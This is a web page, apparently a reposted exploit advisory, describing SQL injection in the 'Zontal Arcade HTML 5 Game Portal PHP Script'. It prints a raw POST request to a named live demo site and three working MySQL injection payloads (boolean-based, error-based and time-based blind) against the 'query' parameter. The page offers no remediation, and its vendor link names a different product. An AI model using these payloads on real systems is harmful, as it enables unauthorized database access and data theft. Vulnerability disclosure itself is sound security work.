Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

# Exploit Title: Zontal Arcade HTML 5 Game Portal PHP # Exploit Title: Zontal Arcade HTML 5 Game Portal PHP Script - SQL Injection
# Date: 05-03-2025
# Exploit Author: Bu?ra Enis D?nmez (n3c1)
# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
# Demo Site: https://mvnstore.in/
# Tested on: Arch Linux
# CVE: N/A


### Request ###

POST /xhr/live-search.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: /
x-requested-with: XMLHttpRequest
Referer: https://localhost
Cookie: PHPSESSID=i1e2drrnljsdoi3v6k60cg9ehi
Content-Length: 135
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: mvnstore.in
Connection: Keep-alive

page=3&query=4

###

### Parameter & Payloads ###

Parameter: query (POST)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
Payload: page=3&query=4%' AND MAKE_SET(4114=4114,6966) AND 'ZtvW%'='ZtvW

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=3&query=4%' AND (SELECT 6392 FROM(SELECT COUNT(*),CONCAT(0x71766b7071,(SELECT (ELT(6392=6392,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NwQp%'='NwQp

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=3&query=4%' AND (SELECT 7502 FROM (SELECT(SLEEP(5)))Eovh) AND 'THGQ%'='THGQ

###